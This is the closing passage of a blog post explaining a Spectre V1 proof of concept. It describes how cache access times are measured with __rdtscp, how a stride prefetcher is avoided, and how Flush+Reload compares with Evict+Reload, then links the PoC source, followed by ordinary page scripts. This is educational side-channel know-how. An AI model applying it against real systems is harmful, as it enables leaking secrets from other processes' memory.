<p>After this, we have the timing part. We access <code>array2</code> elements, time the access and if it's below the threshold we increase corresponding value in <code>results</code> array. The only exception is a value that we used to train branch predictor, which we skip (<code>array1[tries % array1_size]</code>). We access elements in pseudo-random order to avoid stride predictor. If access patterns follow stride, the processor can detect it and prefetch values which would ruin our results.</p>
<p>For measurement, we are using <code>__rdtscp</code> since it is pseudo-serializing (it waits until all previous instructions have executed and all previous loads are globally visible unlike <code>__rdtsc</code>) which makes it less likely to be executed out of order.</p>
<p>The rest of the function is not that interesting, we select two best results and return them.</p>
<p>This POC uses Flash + Reload trick to leak sensitive information, but we can also use Evict + Reload combo. Evict + Reload uses cache contention, instead of flushing cache we replace the memory by loading something else instead.</p>
<p>Slightly modified POC source code can be found <a href="https://github.com/F3real/ctf_solutions/tree/master/2019/Spectre%20V1">here</a>.
If you are interested in more about Spectre you can take a look at Chandler Carruth <a href="https://www.youtube.com/watch?v=_f7O3IfIR2k">talk</a> from CppCon 2018.</p>
</div>
<footer class="text-right">
<p>- F3real</p>
</footer>
<div id="show-comments" class="span7 text-center">
<a href="https://f3real.github.io/spectre_v1.html#disqus_thread"
data-disqus-identifier="spectre_v1"
class="btn btn-primary twitchy-background">Show Comments</a>
</div>
<section id="comments" class="comments hidden">
<hr/>
<h2>Comments</h2>
<div id="disqus_thread"></div>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by
Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</section>
</div>
</div>
</article>
</section>
<footer>
<hr>
<div class="row">
<div class="col-lg-10 text-center">
<p><small>
Built by <a href="http://docs.getpelican.com/en/latest">Pelican</a> / <a href="https://github.com/F3real/pelican-twitchy">pelican-twitchy</a>
· © 2024 F3real
</small></p>
</div>
</div>
</footer> </div>
</div>
<!-- /#page-content-wrapper -->
</div>
<!-- /#wrapper -->
<!-- disqus -->
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
var disqus_shortname = 'https-f3real-github-io'; // required: replace example with your forum shortname
var disqus_identifier = 'spectre_v1';
var disqus_url = 'https://f3real.github.io/spectre_v1.html';
var disqus_config = function () {
this.language = "en";
};
var commentsDiv = document.getElementById('show-comments');
commentsDiv.onclick = function() {
/* * * DON'T EDIT BELOW THIS LINE * * */
(function () {
var dsq = document.createElement('script');
dsq.type = 'text/javascript';
dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
this.style.display = 'none';
};
</script>
<!-- /disqus -->
<script>
const wrapper = document.getElementById('wrapper');
const sidebarBig = document.getElementById('sidebar-wrapper');
const sidebarSmall = document.getElementById('sidebar-wrapper-small');
const triggers = Array.from(document.querySelectorAll('[data-toggle="collapse"]'));
for (var i = 0; i < triggers.length; i++) {
triggers[i].addEventListener('click', (ev) => {
const elm = ev.currentTarget;
ev.preventDefault();
const selector = elm.getAttribute('href').replace('#','');
elm.classList.toggle('collapsed');
document.getElementById(selector).classList.toggle('show');
}, false);
}
function showBigNav() {;
sidebarBig.style.display = 'block';
sidebarSmall.style.display = 'none';
}
function showSmallNav() {
sidebarBig.style.display = 'none';
sidebarSmall.style.display = 'block';
}
const mediaQuery = window.matchMedia('(min-width:768px)');
mediaQuery.onchange = e => {
if (wrapper.classList.contains('toggled')) {
wrapper.classList.remove('toggled');
} else {
if (e.matches) {
showBigNav();
} else {
showSmallNav();
}
}
}
function setNavbar() {
var condition = wrapper.classList.contains('toggled');
if (!mediaQuery.matches) {
condition = !condition;
}
if (condition) {
showSmallNav();
} else {
showBigNav();
}
}
function toggleMenu(){
wrapper.classList.toggle('toggled');
setNavbar();
}
window.onload = setNavbar;
</script>
<script data-goatcounter="https://f3real.goatcounter.com/count"
async src="//gc.zgo.at/count.js"></script>
</body>
</html>